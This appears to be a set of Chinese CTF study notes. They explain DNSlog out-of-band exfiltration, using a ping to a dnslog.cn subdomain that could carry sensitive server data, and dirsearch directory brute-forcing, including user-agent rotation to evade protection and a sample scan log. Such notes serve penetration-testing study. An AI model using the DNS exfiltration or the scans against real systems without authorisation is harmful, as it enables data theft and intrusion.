回显工具:DNSlog
DNS服务器在域名解析过程中,会写日志。解析域名时可以外带出某些服务器敏感信息。可以在DNSlog中回显。
一个简单的例子
- 在DNSlog中,
get subdomain获得三级域名o71jc0.dnslog.cn。 - 本地使用ping命令,
ping 123.o71jc0.dnslog.cn。 - 在DNSlog网页中可以记录到域名解析缓存。
- 这里解析到的是
123,但若将123替换为某些敏感信息,即可实现回显。
适用场景
- 无回显的命令执行
一些常见的DNSlog工具
https://www.dnslog.cn
当然,也可以搭建自己的DNSLog
web目录扫描工具:dirsearch.exe
python的开源项目dirsearch。在windows中同版本可执行文件dirsearch.exe
- 用于CTF信息搜集阶段,通过字典攻击的方式发现网站中可能存在的隐藏目录、文件、后台路径等。
- 隐藏后台
/admin_panel/ - 备份文件
/site.zip、index.bak - 隐藏页面
/flag
- 隐藏后台
安装与使用
pip3 install dirsearch- 使用方法与举例
Usage: dirsearch [-u|--url] target [-e|--extensions] extensions [options]-u: 目标 URL-e: 指定要扫描的文件扩展名(多个用逗号分隔)- 多试试不同的扩展名
.php, .bak, .zip, .tar.gz
- 多试试不同的扩展名
-x403,404: 忽略指定状态码-w: 指定字典(可选)- 默认使用内置字典
/wordlists/: common.txt,extensions_common.txt,small.txt,medium.txt,big.txt(不同的扫描力度),apache.txt,iis.txt, nginx.txt(针对不同的web服务)- 当然也可以指定使用其他字典。如seclists
- 建议:从
common.txt或small.txt开始,快速爆破。若扫不到,再逐步加大字典规模
- 默认使用内置字典
- 若被防护系统限制,可设置
--random-agents模拟不同浏览器
PS C:\Users\xxx> dirsearch.exe -u http://47.105.113.86:40003/
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: C:\Users\xxx\reports\http_47.105.113.86_40003\__25-05-11_16-50-10.txt
Target: http://47.105.113.86:40003/
[16:50:10] Starting:
[16:50:42] 403 - 295B - /.ht_wsr.txt
[16:50:42] 403 - 298B - /.htaccess.bak1
...
